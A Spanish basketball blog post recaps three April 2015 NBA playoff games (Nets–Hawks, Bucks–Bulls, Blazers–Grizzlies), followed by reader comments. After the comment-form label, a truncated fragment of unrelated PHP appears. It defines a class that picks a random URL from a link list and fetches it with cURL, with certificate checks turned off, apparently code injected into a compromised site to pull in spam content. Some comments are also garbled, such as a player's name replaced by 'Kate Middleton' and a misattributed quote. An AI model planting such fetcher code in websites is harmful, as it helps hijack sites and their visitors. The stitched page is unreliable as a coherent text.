La Crónica: Redención

28 de April de 2015 por txusma

Aquí nada regala nada. Anoche, los 3 equipos que van por detrás en las eliminatorias que se ponían en juego se impusieron a sus rivales. Milwaukee y Portland evitaron la eliminación y los Nets empataron la serie y propinaron un “zas! en toda la boca” a este humilde analista con poca idea. Además, presenciamos el resurgir de dos bases que no estaban pasando por su mejor momento: Deron Williams y Damian Lillard.

Atlanta Hawks 115 – Brooklyn Nets 120

Y de repente… Deron Williams. Cuando prácticamente nadie lo esperaba y tras protagonizar un par de partidos nefastos anteriormente, el base de los Nets apareció en el último cuarto para mantener con vida a su equipo y acabar forzando la prórroga. Ya en el primer cuarto (11 puntos) había dado muestras de encontrarse muy fino y entre los 16 puntos que se marcó en los últimos 12 minutos de regular hay que destacar este soberano triple al límite de la posesión que mantenía a los suyos en el partido. Tuvo la oportunidad de poner a los Nets por delante a falta de 5 segundos pero, tras un buen movimiento, el balón no quiso entrar y el partido se acabó decidiendo en el tiempo extra. La prórroga fue muy igualada y el encuentro acabó cayendo del lado local gracias en buena parte a un triple de Bojan Bogdanovic y a los errores de Kyle Korver desde más allá de la línea de 3. Brook Lopez fue el escudero perfecto de Deron con 26 puntos y 10 rebotes y por el lado visitante destacaron Jeff Teague (20 puntos y 11 asistencias) y Demarre Carroll (20 puntos, 9 rebotes y 6 asistencias) aunque, como se acostumbra en los Hawks, todos los jugadores cumplieron con su parte.

MVP: Deron Williams (35 puntos, 5 rebotes, 7 asistencias y 3 robos)

Milwaukee Bucks 94 – Chicago Bulls 88

Hace unos días criticábamos a más no poder en un foro de NBA a Michael Carter-Williams pero es justo reconocer que ayer fue el mejor de un equipo que se resiste a ser eliminado y que está en disposición de poner en aprietos al tercer mejor equipo de la conferencia Este. Y eso que en el tercer cuarto se tuvo que retirar unos minutos debido a una torcedura de tobillo. A la media parte los locales llegaron 3 puntos arriba y a pesar de no acumular nunca más de 9 puntos de ventaja fueron capaces de resistir las embestidas de Chicago personalizadas en Pau Gasol, el mejor de los suyos con 25 puntos, 10 rebotes y 4 asistencias. De todas maneras, hay que tener en cuenta que en un muy mal partido de Derrick Rose y Jimmy Butler (10 de 41 en TC entre los dos), los locales tuvieron opciones hasta los últimos minutos por lo que la lógica parece determinar que la victoria no se les debería escapar a poco que los jugadores afinen la puntería pero atención que el próximo partido se disputa en Milwaukee y los playoffs tienen poco de lógicos. Cuidado…

MVP: Michael Carter-Williams (22 puntos, 8 rebotes y 9 asistencias)

Memphis Grizzlies 92 – Portland TrailBlazers 99

¡Vaya partido se les escapó a los Grizzlies anoche! Los de Memphis llegaban con la baja de Mike Conley, un jugador infravaloradísimo que estaba marcando las diferencias en la serie hasta el momento, y tal vez por esta razón los Blazers y especialmente Damian Lillard jugaron en la primera parte sus mejores minutos de la eliminatoria y consigueron irse al descanso 7 arriba. Pero esta clase de situaciones no amilanan a los ositos, y con un parcial de 27-13 en el tercer cuarto liderado por Courtney Lee y Zach Randolph los de David Joerger le dieron la vuelta al partido y consiguieron ponerse 10 arriba a falta de unos 6 minutos para el final. En ese punto volvió a aparecer Lillard y emergió además la figura de CJ McCollum, autor de 7 puntos claves en la victoria de los de Oregon. Entre los dos le dieron la vuelta al partido y mantuvieron a los suyos por delante en el marcador en los segundos finales. Increiblemente, los Grizzlies habían dejado escapar un partido que parecían tener totalmente controlado.

MVP: Damian Lillard (32 puntos y 7 asistencias)

Comenta

5 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Juegan ahora en Milwaukee, Txusma 😛

    Increíble estos Bulls… de 3-0 y empate a 90 con posesión a falta de 10 segundos… a 3-2 y jugar en Milwaukee. Vaya forma de desaprovechar la lesión de Love, que como vuelva para el 6º o 7º de la serie (si es que hubiera)… en fin.

    Los Grizzlies… no sé yo si se dejaron llevar. Teniendo la baja de Conley no les conviene enfrentarse a Warrios. Mejor darle unos días más a su base para recuperarse de esa operación.

    Y los Hawks, pues dejaron el partido escapar, y con 2-2 toda la presión está sobre ellos… mucho ojo ahora.

      Citar

  2. Triceratops dice:
    #2

    Kate Middleton es la hostia. Ese tio es agente libre en verano, no? Pues se puede sacar un contratazo bastante bueno. En los Bucks cuando vuelva Jabari, no va a tener sitio, lo más logico es cambiar de aires. Me parece un jugador completisimo, aporta en cualquier faceta.
    El año pasado ya hizo buenos números pero pensaba que era gracias a que los Bucks eran penosos y sus estadisticas estaban infladas. Pero este año se ha destapado convirtiendose en una de las sensaciones de la temporada.

      Citar

  3. Ruxixón dice:
    #3

    No podían acabar los PO sin una de Lillard,se le echaba de menos y no cabe duda aprovechó la ausencia de Conley.Se ha destacado la aportación de McCollum pero no dejaría mucho más atrás los minutos de Leonard.Fundamentales los dos hombres de banquillo para compensar lo de un Batum para mí horrible,que sumó 13 rebotes pero cometió pérdidas absurdas y estuvo muy fallón,y Aldridge sufriendo en sus carnes la defensa de Randolph y de Marc.De Afflalo poco que decir,no ha aterrizado en Oregon todavía.Creo que no estará para el siguiente partido pero o empiezan a sacarse más conejos de la chistera o Portland lo tiene harto complicado para volver a traer la serie al Mode Center.

      Citar

  4. txusma dice:
    #4

    Jose Luis:
    Juegan ahora en Milwaukee, Txusma :P

    Y yo pq tenía la idea de que el partido de ayer fue en Milwaukee y el siguiente era en Chicago? Pues más crédito para los Bucks.

    Ya lo corregí, gracias por al aviso.

      Citar

  5. Azabel dice:
    #5

    Triceratops: bar los PO sin una de Lillard,se le echaba de menos y no cabe duda aprovechó la ausencia de Conley.Se ha destacado la aportación de McCollum pero no dejaría mucho más atrás los minutos de Leonard.Fundamentales los dos hombres de banquillo para compensar lo de un Batum para mí horrible,que sumó 13 rebotes pero cometió pérdidas absurdas y estuvo muy fallón,y Aldridge sufriendo en sus carnes la defensa de Randolph y de Marc.De Afflalo poco que decir,no ha aterrizado en Oregon todavía.Creo que no estará para el siguiente partido pero o empiezan a sacarse más conejos de la chister

    absolutamente, sobretodo en el segundo tramo de campaña, justo despues de la lesion de Parker, es un buen defensor y buen tirador, pero sobretodo es un jugador de rol que no necesita ni pedira demasiado protagonismo, ideal para mezclarlo en un equipo de varios tiradores,

    me hace acordar mucho a Wesley Mathews

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>